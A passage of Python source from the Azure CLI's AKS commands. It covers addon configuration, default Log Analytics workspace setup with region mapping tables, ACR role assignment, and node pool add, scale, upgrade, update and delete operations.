                    raise ValidationError('The confcom addon is already enabled for this managed cluster.',
                                          recommendation='To change confcom configuration, run '
                                          f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
                                          'before enabling it again.')
                # SGX quote helper defaults to off unless explicitly requested
                addon_profile = ManagedClusterAddonProfile(
                    enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
                if enable_sgxquotehelper:
                    addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
            addon_profiles[addon] = addon_profile
        else:
            if addon not in addon_profiles:
                if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
                    # dashboard may be absent from the profile map; create a
                    # disabled entry so the update below succeeds
                    addon_profiles[addon] = ManagedClusterAddonProfile(
                        enabled=False)
                else:
                    raise CLIError(
                        "The addon {} is not installed.".format(addon))
            addon_profiles[addon].config = None
        addon_profiles[addon].enabled = enable

    instance.addon_profiles = addon_profiles

    # null out the SP and AAD profile because otherwise validation complains
    instance.service_principal_profile = None
    instance.aad_profile = None

    return instance
def _get_azext_module(extension_name, module_name):
    """Import and return the implementation module of an installed CLI extension."""
    try:
        # Put the installed extension on the import path, then load its module.
        from azure.cli.core.extension.operations import add_extension_to_path
        add_extension_to_path(extension_name)
        from importlib import import_module
        return import_module(module_name)
    except ImportError as ie:
        raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
                        workspace_resource_id=None,
                        aci_subnet_name=None,
                        vnet_subnet_id=None,
                        appgw_name=None,
                        appgw_subnet_cidr=None,
                        appgw_id=None,
                        appgw_subnet_id=None,
                        appgw_watch_namespace=None,
                        enable_sgxquotehelper=False):
    """Translate the --enable-addons value (and its companion options) into
    ManagedClusterAddonProfile entries at cluster-create time.

    Each recognized addon name is consumed from the comma-separated
    *addons_str*; anything left over afterwards is reported as an error.
    Returns the (possibly newly created) addon_profiles dict.
    """
    ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                operation_group='managed_clusters')
    if not addon_profiles:
        addon_profiles = {}

    addons = addons_str.split(',') if addons_str else []
    if 'http_application_routing' in addons:
        addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('http_application_routing')
    if 'kube-dashboard' in addons:
        addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('kube-dashboard')
    # TODO: can we help the user find a workspace resource ID?
    if 'monitoring' in addons:
        if not workspace_resource_id:
            # use default workspace if exists else create default workspace
            workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
                cmd, subscription_id, resource_group_name)

        # normalize to a canonical ARM ID: leading slash, no trailing slash
        workspace_resource_id = workspace_resource_id.strip()
        if not workspace_resource_id.startswith('/'):
            workspace_resource_id = '/' + workspace_resource_id
        if workspace_resource_id.endswith('/'):
            workspace_resource_id = workspace_resource_id.rstrip('/')
        addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
        addons.remove('monitoring')
    # error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
    elif workspace_resource_id:
        raise CLIError(
            '"--workspace-resource-id" requires "--enable-addons monitoring".')
    if 'azure-policy' in addons:
        addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
            enabled=True)
        addons.remove('azure-policy')
    if 'virtual-node' in addons:
        if not aci_subnet_name or not vnet_subnet_id:
            raise CLIError(
                '"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
        # TODO: how about aciConnectorwindows, what is its addon name?
        os_type = 'Linux'
        addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
            enabled=True,
            config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
        )
        addons.remove('virtual-node')
    if 'ingress-appgw' in addons:
        addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
        # only forward the appgw options the user actually supplied
        if appgw_name is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
        if appgw_subnet_cidr is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
        if appgw_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
        if appgw_subnet_id is not None:
            addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
        if appgw_watch_namespace is not None:
            addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
        addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
        addons.remove('ingress-appgw')
    if 'confcom' in addons:
        # SGX quote helper defaults to off unless explicitly requested
        addon_profile = ManagedClusterAddonProfile(
            enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
        if enable_sgxquotehelper:
            addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
        addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
        addons.remove('confcom')
    # error out if any (unrecognized) addons remain
    if addons:
        raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
            ",".join(addons), "are" if len(addons) > 1 else "is"))
    return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
    """Best-effort install of a CLI extension; True on success, False on any failure."""
    try:
        from azure.cli.core.extension import operations
        operations.add_extension(cmd=cmd, extension_name=extension_name)
        return True
    except Exception:  # noqa pylint: disable=broad-except
        # installation is best-effort; report any failure as False
        return False
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
    """Update an installed CLI extension and reload it in-process.

    Returns True on success; False when the extension is not installed or its
    module cannot be loaded after the update. A CLIError raised by the updater
    is logged at info level and treated as non-fatal.
    """
    from azure.cli.core.extension import ExtensionNotInstalledException
    try:
        from azure.cli.core.extension import operations
        operations.update_extension(cmd=cmd, extension_name=extension_name)
        # pick up the freshly installed code without restarting the CLI
        operations.reload_extension(extension_name=extension_name)
    except CLIError as err:
        # non-fatal: log and continue, still reporting success below
        logger.info(err)
    except ExtensionNotInstalledException as err:
        logger.debug(err)
        return False
    except ModuleNotFoundError as err:
        logger.debug(err)
        logger.error(
            "Error occurred attempting to load the extension module. Use --debug for more information.")
        return False
    return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
    """Ensure the named CLI extension is available, installing or updating it as needed.

    Returns True when the extension is usable afterwards.
    """
    from azure.cli.core.extension import (
        ExtensionNotInstalledException, get_extension)
    try:
        get_extension(extension_name)
    except ExtensionNotInstalledException:
        # not present yet: best-effort install
        return _install_dev_spaces_extension(cmd, extension_name)
    # already installed; optionally refresh it
    # (_update_dev_spaces_extension handles its own exceptions, so moving the
    # call out of the try block does not change behavior)
    if update:
        return _update_dev_spaces_extension(cmd, extension_name, extension_module)
    return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
    """Return the resource ID of the subscription's default Log Analytics
    workspace for the monitoring addon, creating the workspace (and its
    'DefaultResourceGroup-<code>' resource group) when missing.

    The workspace region is derived from the cluster resource group's region
    via the per-cloud mapping tables below; unmapped regions fall back to a
    per-cloud default (or to the RG's own region for unknown clouds).
    """
    # mapping for azure public cloud
    # log analytics workspaces cannot be created in WCUS region due to capacity limits
    # so mapped to EUS per discussion with log analytics team
    AzureCloudLocationToOmsRegionCodeMap = {
        "australiasoutheast": "ASE",
        "australiaeast": "EAU",
        "australiacentral": "CAU",
        "canadacentral": "CCA",
        "centralindia": "CIN",
        "centralus": "CUS",
        "eastasia": "EA",
        "eastus": "EUS",
        "eastus2": "EUS2",
        "eastus2euap": "EAP",
        "francecentral": "PAR",
        "japaneast": "EJP",
        "koreacentral": "SE",
        "northeurope": "NEU",
        "southcentralus": "SCUS",
        "southeastasia": "SEA",
        "uksouth": "SUK",
        "usgovvirginia": "USGV",
        "westcentralus": "EUS",
        "westeurope": "WEU",
        "westus": "WUS",
        "westus2": "WUS2",
        "brazilsouth": "CQ",
        "brazilsoutheast": "BRSE",
        "norwayeast": "NOE",
        "southafricanorth": "JNB",
        "northcentralus": "NCUS",
        "uaenorth": "DXB",
        "germanywestcentral": "DEWC",
        "ukwest": "WUK",
        "switzerlandnorth": "CHN",
        "switzerlandwest": "CHW",
        "uaecentral": "AUH"
    }
    AzureCloudRegionToOmsRegionMap = {
        "australiacentral": "australiacentral",
        "australiacentral2": "australiacentral",
        "australiaeast": "australiaeast",
        "australiasoutheast": "australiasoutheast",
        "brazilsouth": "brazilsouth",
        "canadacentral": "canadacentral",
        "canadaeast": "canadacentral",
        "centralus": "centralus",
        "centralindia": "centralindia",
        "eastasia": "eastasia",
        "eastus": "eastus",
        "eastus2": "eastus2",
        "francecentral": "francecentral",
        "francesouth": "francecentral",
        "japaneast": "japaneast",
        "japanwest": "japaneast",
        "koreacentral": "koreacentral",
        "koreasouth": "koreacentral",
        "northcentralus": "northcentralus",
        "northeurope": "northeurope",
        "southafricanorth": "southafricanorth",
        "southafricawest": "southafricanorth",
        "southcentralus": "southcentralus",
        "southeastasia": "southeastasia",
        "southindia": "centralindia",
        "uksouth": "uksouth",
        "ukwest": "ukwest",
        "westcentralus": "eastus",
        "westeurope": "westeurope",
        "westindia": "centralindia",
        "westus": "westus",
        "westus2": "westus2",
        "norwayeast": "norwayeast",
        "norwaywest": "norwayeast",
        "switzerlandnorth": "switzerlandnorth",
        "switzerlandwest": "switzerlandwest",
        "uaenorth": "uaenorth",
        "germanywestcentral": "germanywestcentral",
        "germanynorth": "germanywestcentral",
        "uaecentral": "uaecentral",
        "eastus2euap": "eastus2euap",
        "brazilsoutheast": "brazilsoutheast"
    }
    # mapping for azure china cloud
    # currently log analytics supported only China East 2 region
    AzureChinaLocationToOmsRegionCodeMap = {
        "chinaeast": "EAST2",
        "chinaeast2": "EAST2",
        "chinanorth": "EAST2",
        "chinanorth2": "EAST2"
    }
    AzureChinaRegionToOmsRegionMap = {
        "chinaeast": "chinaeast2",
        "chinaeast2": "chinaeast2",
        "chinanorth": "chinaeast2",
        "chinanorth2": "chinaeast2"
    }
    # mapping for azure us government cloud
    AzureFairfaxLocationToOmsRegionCodeMap = {
        "usgovvirginia": "USGV",
        "usgovarizona": "PHX"
    }
    AzureFairfaxRegionToOmsRegionMap = {
        "usgovvirginia": "usgovvirginia",
        "usgovtexas": "usgovvirginia",
        "usgovarizona": "usgovarizona"
    }
    rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    cloud_name = cmd.cli_ctx.cloud.name
    # fallbacks used when the RG's region appears in none of the maps
    workspace_region = "eastus"
    workspace_region_code = "EUS"
    # sanity check that locations and clouds match.
    if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
            (cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
        raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
                       .format(rg_location))
    # resolve workspace region and its short code for the current cloud
    if cloud_name.lower() == 'azurecloud':
        workspace_region = AzureCloudRegionToOmsRegionMap.get(
            rg_location, "eastus")
        workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
            workspace_region, "EUS")
    elif cloud_name.lower() == 'azurechinacloud':
        workspace_region = AzureChinaRegionToOmsRegionMap.get(
            rg_location, "chinaeast2")
        workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
            workspace_region, "EAST2")
    elif cloud_name.lower() == 'azureusgovernment':
        workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
            rg_location, "usgovvirginia")
        workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
            workspace_region, "USGV")
    else:
        # unknown cloud: keep the RG's own region
        workspace_region = rg_location
        workspace_region_code = rg_location.upper()
    default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
    default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
        subscription_id, workspace_region_code)
    default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
        '/workspaces/{2}'.format(subscription_id,
                                 default_workspace_resource_group, default_workspace_name)
    resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    # check if default RG exists
    if resource_groups.check_existence(default_workspace_resource_group):
        try:
            resource = resources.get_by_id(
                default_workspace_resource_id, '2015-11-01-preview')
            return resource.id
        except CloudError as ex:
            # 404 -> the RG exists but the workspace does not yet; fall
            # through and create it below
            if ex.status_code != 404:
                raise ex
    else:
        # TODO: track2/replace create_or_update with begin_create_or_update, depends on 'azure.mgmt.resource.resources'
        resource_groups.create_or_update(default_workspace_resource_group, {
            'location': workspace_region})
    GenericResource = cmd.get_models(
        'GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    generic_resource = GenericResource(location=workspace_region, properties={
        'sku': {'name': 'standalone'}})
    async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
                                                          generic_resource)
    ws_resource_id = ''
    # poll in 15-second slices until the workspace creation completes
    while True:
        result = async_poller.result(15)
        if async_poller.done():
            ws_resource_id = result.id
            break
    return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
    """Deploy the ContainerInsights solution onto the Log Analytics workspace
    referenced by the monitoring addon profile.

    Reads the workspace resource ID from addon.config and submits an ARM
    deployment (into the workspace's own subscription/resource group) that
    creates the 'ContainerInsights(<workspace>)' solution resource.

    :raises CLIError: When the workspace resource ID cannot be parsed.
    """
    # Workaround for this addon key which has been seen lowercased in the wild.
    for key in list(addon.config):
        if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
                key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
            addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
                key)
    workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
    # normalize to a canonical ARM ID: leading slash, no trailing slash
    workspace_resource_id = workspace_resource_id.strip()
    if not workspace_resource_id.startswith('/'):
        workspace_resource_id = '/' + workspace_resource_id
    if workspace_resource_id.endswith('/'):
        workspace_resource_id = workspace_resource_id.rstrip('/')
    # extract subscription ID and resource group from workspace_resource_id URL
    try:
        subscription_id = workspace_resource_id.split('/')[2]
        resource_group = workspace_resource_id.split('/')[4]
    except IndexError:
        raise CLIError(
            'Could not locate resource group in workspace-resource-id URL.')
    # region of workspace can be different from region of RG so find the location of the workspace_resource_id
    resources = cf_resources(cmd.cli_ctx, subscription_id)
    try:
        resource = resources.get_by_id(
            workspace_resource_id, '2015-11-01-preview')
        location = resource.location
    except CloudError as ex:
        raise ex
    # millisecond timestamp used to make the deployment names unique
    unix_time_in_millis = int(
        (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
    solution_deployment_name = 'ContainerInsights-{}'.format(
        unix_time_in_millis)
    # nested ARM deployment: the inner deployment targets the workspace's
    # subscription/RG (split from the workspace resource ID)
    # pylint: disable=line-too-long
    template = {
        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
        "contentVersion": "1.0.0.0",
        "parameters": {
            "workspaceResourceId": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics Resource ID"
                }
            },
            "workspaceRegion": {
                "type": "string",
                "metadata": {
                    "description": "Azure Monitor Log Analytics workspace region"
                }
            },
            "solutionDeploymentName": {
                "type": "string",
                "metadata": {
                    "description": "Name of the solution deployment"
                }
            }
        },
        "resources": [
            {
                "type": "Microsoft.Resources/deployments",
                "name": "[parameters('solutionDeploymentName')]",
                "apiVersion": "2017-05-10",
                "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
                "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
                "properties": {
                    "mode": "Incremental",
                    "template": {
                        "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
                        "contentVersion": "1.0.0.0",
                        "parameters": {},
                        "variables": {},
                        "resources": [
                            {
                                "apiVersion": "2015-11-01-preview",
                                "type": "Microsoft.OperationsManagement/solutions",
                                "location": "[parameters('workspaceRegion')]",
                                "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                "properties": {
                                    "workspaceResourceId": "[parameters('workspaceResourceId')]"
                                },
                                "plan": {
                                    "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
                                    "product": "[Concat('OMSGallery/', 'ContainerInsights')]",
                                    "promotionCode": "",
                                    "publisher": "Microsoft"
                                }
                            }
                        ]
                    },
                    "parameters": {}
                }
            }
        ]
    }

    params = {
        "workspaceResourceId": {
            "value": workspace_resource_id
        },
        "workspaceRegion": {
            "value": location
        },
        "solutionDeploymentName": {
            "value": solution_deployment_name
        }
    }

    deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
    # publish the Container Insights solution to the Log Analytics workspace
    return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
                              validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_acr(cli_ctx,
                    client_id,
                    acr_name_or_id,
                    subscription_id,
                    detach=False):
    """Grant (or, with detach=True, revoke) the cluster identity's role assignment on an ACR.

    acr_name_or_id accepts either a full registry resource ID or a bare
    registry name; a bare name is looked up across all resource groups.
    """
    from msrestazure.tools import is_valid_resource_id, parse_resource_id

    if is_valid_resource_id(acr_name_or_id):
        # Resolve the registry directly from its resource ID.
        try:
            parsed = parse_resource_id(acr_name_or_id)
            acr_client = cf_container_registry_service(
                cli_ctx, subscription_id=parsed['subscription'])
            registry = acr_client.registries.get(
                parsed['resource_group'], parsed['name'])
        except CloudError as ex:
            raise CLIError(ex.message)
        _ensure_aks_acr_role_assignment(
            cli_ctx, client_id, registry.id, detach)
        return

    # Fall back to locating the registry by name across all resource groups.
    try:
        registry = get_resource_by_name(
            cli_ctx, acr_name_or_id, 'Microsoft.ContainerRegistry/registries')
    except CloudError as ex:
        if 'was not found' in ex.message:
            raise CLIError(
                "ACR {} not found. Have you provided the right ACR name?".format(acr_name_or_id))
        raise CLIError(ex.message)
    _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
    return
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Return the details of a single agent pool in a managed cluster."""
    return client.get(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
    """List every agent pool of the given managed cluster."""
    pools = client.list(resource_group_name, cluster_name)
    return pools
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
                      kubernetes_version=None,
                      zones=None,
                      enable_node_public_ip=False,
                      node_public_ip_prefix_id=None,
                      node_vm_size=None,
                      node_osdisk_type=None,
                      node_osdisk_size=0,
                      node_count=3,
                      vnet_subnet_id=None,
                      ppg=None,
                      max_pods=0,
                      os_type="Linux",
                      min_count=None,
                      max_count=None,
                      enable_cluster_autoscaler=False,
                      node_taints=None,
                      priority=CONST_SCALE_SET_PRIORITY_REGULAR,
                      eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
                      spot_max_price=float('nan'),
                      tags=None,
                      labels=None,
                      max_surge=None,
                      mode="User",
                      enable_encryption_at_host=False,
                      enable_ultra_ssd=False,
                      no_wait=False):
    """Add a new agent (node) pool to an existing managed cluster.

    Builds an AgentPool model from the supplied flags and submits it via
    begin_create_or_update. Fails fast if a pool with the same name exists.

    :raises CLIError: if the pool name is already taken, or the autoscaler
        count flags are inconsistent (validated by _check_cluster_autoscaler_flag).
    """
    AgentPool = cmd.get_models('AgentPool',
                               resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                               operation_group='agent_pools')
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='agent_pools')
    # Reject duplicate pool names up front with a friendlier error than the RP's.
    instances = client.list(resource_group_name, cluster_name)
    for agentpool_profile in instances:
        if agentpool_profile.name == nodepool_name:
            raise CLIError("Node pool {} already exists, please try a different name, "
                           "use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
    upgradeSettings = AgentPoolUpgradeSettings()
    taints_array = []
    # Taints arrive as a single comma-separated string.
    if node_taints is not None:
        for taint in node_taints.split(','):
            try:
                taint = taint.strip()
                taints_array.append(taint)
            # NOTE(review): str.strip()/list.append do not raise ValueError, so this
            # handler looks unreachable — presumably a leftover from stricter
            # taint-format validation; confirm before removing.
            except ValueError:
                raise CLIError(
                    'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
    # Pick a sensible default VM size per OS when none was requested.
    if node_vm_size is None:
        if os_type.lower() == "windows":
            node_vm_size = "Standard_D2s_v3"
        else:
            node_vm_size = "Standard_DS2_v2"
    if max_surge:
        upgradeSettings.max_surge = max_surge
    agent_pool = AgentPool(
        name=nodepool_name,
        tags=tags,
        node_labels=labels,
        count=int(node_count),
        vm_size=node_vm_size,
        os_type=os_type,
        vnet_subnet_id=vnet_subnet_id,
        proximity_placement_group_id=ppg,
        agent_pool_type="VirtualMachineScaleSets",
        max_pods=int(max_pods) if max_pods else None,
        orchestrator_version=kubernetes_version,
        availability_zones=zones,
        scale_set_priority=priority,
        enable_node_public_ip=enable_node_public_ip,
        node_public_ip_prefix_id=node_public_ip_prefix_id,
        node_taints=taints_array,
        upgrade_settings=upgradeSettings,
        enable_encryption_at_host=enable_encryption_at_host,
        enable_ultra_ssd=enable_ultra_ssd,
        mode=mode
    )
    # Spot pools additionally carry an eviction policy and a max price;
    # the CLI's NaN sentinel means "no cap", which the service expects as -1.
    if priority == CONST_SCALE_SET_PRIORITY_SPOT:
        agent_pool.scale_set_eviction_policy = eviction_policy
        if isnan(spot_max_price):
            spot_max_price = -1
        agent_pool.spot_max_price = spot_max_price
    # Validates min/max/node counts and stamps autoscaler settings on the pool.
    _check_cluster_autoscaler_flag(
        enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
    if node_osdisk_size:
        agent_pool.os_disk_size_gb = int(node_osdisk_size)
    if node_osdisk_type:
        agent_pool.os_disk_type = node_osdisk_type
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        agent_pool,
    )
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
                        nodepool_name,
                        node_count=3,
                        no_wait=False):
    """Manually scale a node pool to *node_count* nodes.

    Manual scaling is mutually exclusive with the cluster autoscaler, and a
    no-op request is rejected up front to avoid a pointless PUT.
    """
    pool = client.get(resource_group_name, cluster_name, nodepool_name)
    target_count = int(node_count)
    if pool.enable_auto_scaling:
        raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
    if target_count == pool.count:
        raise CLIError(
            "The new node count is the same as the current node count.")
    pool.count = target_count  # pylint: disable=no-member
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        pool,
    )
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
                          nodepool_name,
                          kubernetes_version='',
                          node_image_only=False,
                          max_surge=None,
                          no_wait=False):
    """Upgrade a node pool's Kubernetes version, or only its node OS image.

    :param kubernetes_version: target orchestrator version; must be left empty
        when --node-image-only is used.
    :param node_image_only: when True, upgrade just the node image.
    :param max_surge: optional surge setting applied to the pool's upgrade settings.
    :raises CLIError: when both a Kubernetes version and --node-image-only are given.
    """
    # Pass resource_type explicitly, for consistency with the other agent-pool
    # commands in this module, so the model resolves from the same API profile.
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='agent_pools')
    if kubernetes_version != '' and node_image_only:
        raise CLIError(
            'Conflicting flags. Upgrading the Kubernetes version will also '
            'upgrade node image version. If you only want to upgrade the '
            'node version please use the "--node-image-only" option only.'
        )
    if node_image_only:
        return _upgrade_single_nodepool_image_version(no_wait,
                                                      client,
                                                      resource_group_name,
                                                      cluster_name,
                                                      nodepool_name)
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    instance.orchestrator_version = kubernetes_version
    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()
    if max_surge:
        instance.upgrade_settings.max_surge = max_surge
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        instance,
    )
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
                         enable_cluster_autoscaler=False,
                         disable_cluster_autoscaler=False,
                         update_cluster_autoscaler=False,
                         min_count=None, max_count=None,
                         tags=None,
                         max_surge=None,
                         mode=None,
                         no_wait=False):
    """Update mutable settings of an existing node pool.

    At most one of the three autoscaler flags may be set; alternatively tags,
    mode or max-surge may be updated on their own.

    :raises CLIError: if more than one autoscaler flag is given, nothing to
        update was specified, or the flag conflicts with the pool's current
        autoscaler state.
    """
    AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
                                              resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                              operation_group='agent_pools')
    # Booleans sum as ints; more than one autoscaler flag at a time is ambiguous.
    update_autoscaler = enable_cluster_autoscaler + \
        disable_cluster_autoscaler + update_cluster_autoscaler
    if update_autoscaler > 1:
        raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler"')
    if (update_autoscaler == 0 and not tags and not mode and not max_surge):
        raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
                       '"--disable-cluster-autoscaler" or '
                       '"--update-cluster-autoscaler" or '
                       '"--tags" or "--mode" or "--max-surge"')
    instance = client.get(resource_group_name, cluster_name, nodepool_name)
    # min/max are mandatory when enabling or updating the autoscaler.
    _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
                                       update_cluster_autoscaler)
    if enable_cluster_autoscaler:
        if instance.enable_auto_scaling:
            # Already on: warn and return early without issuing a PUT.
            logger.warning('Autoscaler is already enabled for this node pool.\n'
                           'Please run "az aks nodepool update --update-cluster-autoscaler" '
                           'if you want to update min-count or max-count.')
            return None
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
        instance.enable_auto_scaling = True
    if update_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            raise CLIError('Autoscaler is not enabled for this node pool.\n'
                           'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable cluster with min-count and max-count.')
        instance.min_count = int(min_count)
        instance.max_count = int(max_count)
    if not instance.upgrade_settings:
        instance.upgrade_settings = AgentPoolUpgradeSettings()
    if max_surge:
        instance.upgrade_settings.max_surge = max_surge
    if disable_cluster_autoscaler:
        if not instance.enable_auto_scaling:
            # Already off: warn and return early without issuing a PUT.
            logger.warning(
                'Autoscaler is already disabled for this node pool.')
            return None
        instance.enable_auto_scaling = False
        instance.min_count = None
        instance.max_count = None
    instance.tags = tags
    if mode is not None:
        instance.mode = mode
    return sdk_no_wait(
        no_wait,
        client.begin_create_or_update,
        resource_group_name,
        cluster_name,
        nodepool_name,
        instance,
    )
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
                         nodepool_name,
                         no_wait=False):
    """Delete a node pool from a managed cluster.

    Verifies the pool exists first (case-insensitively) so the user gets a
    clear error instead of a raw service failure.

    :raises CLIError: if no node pool with the given name exists on the cluster.
    """
    instances = client.list(resource_group_name, cluster_name)
    # any() with a generator replaces the manual flag-and-break loop.
    agentpool_exists = any(
        agentpool_profile.name.lower() == nodepool_name.lower()
        for agentpool_profile in instances
    )
    if not agentpool_exists:
        # Typo fixed: "doesnt" -> "doesn't" in the user-facing message.
        raise CLIError("Node pool {} doesn't exist, "
                       "use 'aks nodepool list' to get current node pool list".format(nodepool_name))
    return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
    """Fetch the upgrade profile for a node pool."""
    profile = client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
    return profile
def _ensure_aks_acr_role_assignment(cli_ctx,
                                    client_id,
                                    registry_id,
                                    detach=False):
    """Grant (or, when *detach*, revoke) the 'acrpull' role on *registry_id* for *client_id*."""
    if detach:
        removed = _delete_role_assignments(cli_ctx,
                                           'acrpull',
                                           client_id,
                                           scope=registry_id)
        if not removed:
            raise CLIError('Could not delete role assignments for ACR. '
                           'Are you an Owner on this subscription?')
        return
